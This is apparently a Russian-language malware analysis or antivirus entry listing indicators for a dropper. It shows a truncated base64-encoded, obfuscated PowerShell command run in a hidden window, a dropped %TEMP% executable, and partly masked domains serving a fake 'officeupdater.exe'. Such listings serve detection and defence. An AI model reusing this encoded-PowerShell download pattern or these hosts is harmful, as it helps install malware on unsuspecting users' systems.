Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAKABnAEUAVAAtAFYAQQByAGkAYQBiAGwAZQAgACcAKgBtAEQAUgAqACcAKQAuAE4AQQBNAEUAWwAzACwAMQAxACwAMgBdAC0ASgBPAGkATgAnACcAKQAgACgAbgBFAFcALQBvAEIAagBlAEMAVAAgAEkATwAuAGMATwBNAHAAUgBFAFMAcwBJAE...
- %TEMP%\427847.exe
- 'pe##igon.hu':80
- 'va###im9.com':80
- http://pe##igon.hu/officeupdater.exe
- http://www.pe##igon.hu/officeupdater.exe
- http://va###im9.com/officeupdater.exe
- DNS ASK pe##igon.hu
- DNS ASK va###im9.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAmACgAKABnAEUAVAAtAFYAQQByAGkAYQBiAGwAZQAgACcAKgBtAEQAUgAqACcAKQAuAE4AQQBNAEUAWwAzACwAMQAxACwAMgBdAC0ASgBPAGkATgAnACcAKQAgACgAbgBFAFcALQBvAEIAagBlAEMAVAAgAEkATwAuAGMATwBNAHAAUgBFAFMAcwBJAE...' (со скрытым окном)